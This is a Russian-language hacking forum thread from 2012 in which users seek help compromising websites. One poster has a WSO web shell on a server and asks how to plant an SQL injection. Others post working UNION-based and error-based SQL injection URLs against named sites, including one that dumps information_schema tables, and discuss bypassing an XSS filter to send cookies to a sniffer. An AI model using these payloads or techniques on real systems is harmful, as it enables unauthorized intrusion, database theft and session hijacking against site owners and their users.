ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.05.2012, 13:18
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
Ребят,такая проблема,подскажите,плз...
Есть сайт,висит на Windows,бд MSSQL...также на нем есть старый блог на вордпресс с MySQL и неприкрытым phpmyadmin...через блог залил шелл WSO,оказался внутри сервака,но под гостем...exe запускать не могу,но файлы сайта(asp) изменять могу...нашел данные от MSSQL,но по ним не подрубается...
Вопрос: что нужно добавить к примеру в 404.asp,чтобы создать искусственную sql-иньецию(возможно у MSSQL больше прав)?
|
|
|
24.05.2012, 15:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
5556
Репутация:
2
|
|
вроде нaшел скулю пишет ошибка
Сообщение от None
SQLSTATE[HY000]: General error: 1191 Can't find FULLTEXT index matching the column list
как раскрутить? |
|
|
|
24.05.2012, 15:15
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от Spoos
Spoos said:
вроде нaшел скулю пишет ошибка
как раскрутить?
А как крутил ?
|
|
|
|
24.05.2012, 15:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
5556
Репутация:
2
|
|
Сообщение от t3cHn0iD
t3cHn0iD said:
А как крутил ?
http://admin.site.com/goods/?where=dsffds''
|
|
|
|
24.05.2012, 15:36
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Spoos
Spoos said:
http://admin.site.com/goods/?where=dsffds''
Код:
Code:
http://admin.site.com//goods/?where=1)+limit+1,1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,user(),database(),version()),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+
|
|
|
|
25.05.2012, 01:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Можно получить права админа mysql с помощью phpmyadmin 2.11.11.3
Учетка юзера в базе есть, к file нет привилегий.
|
|
|
|
25.05.2012, 06:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
|
|
|
|
25.05.2012, 07:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от justonline
justonline said:
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Где
Сообщение от None
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
это alert('XSS').
|
|
|
|
25.05.2012, 07:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от Ereee
Ereee said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Где
это alert('XSS'). работать дальше тега input нельзя. и больше 100 символов писать нельзя
на сайте закрыто все, что можно из xss... но одно поле забыли...и то сделали фильтрацию // только для того, что бы не было нагромождений и показывало обычный урл. Они даааже не подозревали, сколько это вызовет у меня негодований
энибоди кен хелп ми?
|
|
|
|
25.05.2012, 21:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
такой вопросец
нормально вывело версию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
пытаюсь к примеру вывести таблицы
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws(0x3a,table_schema,table_name,table_rows)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
уже переадресация, чёзаа байда, как боротся? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
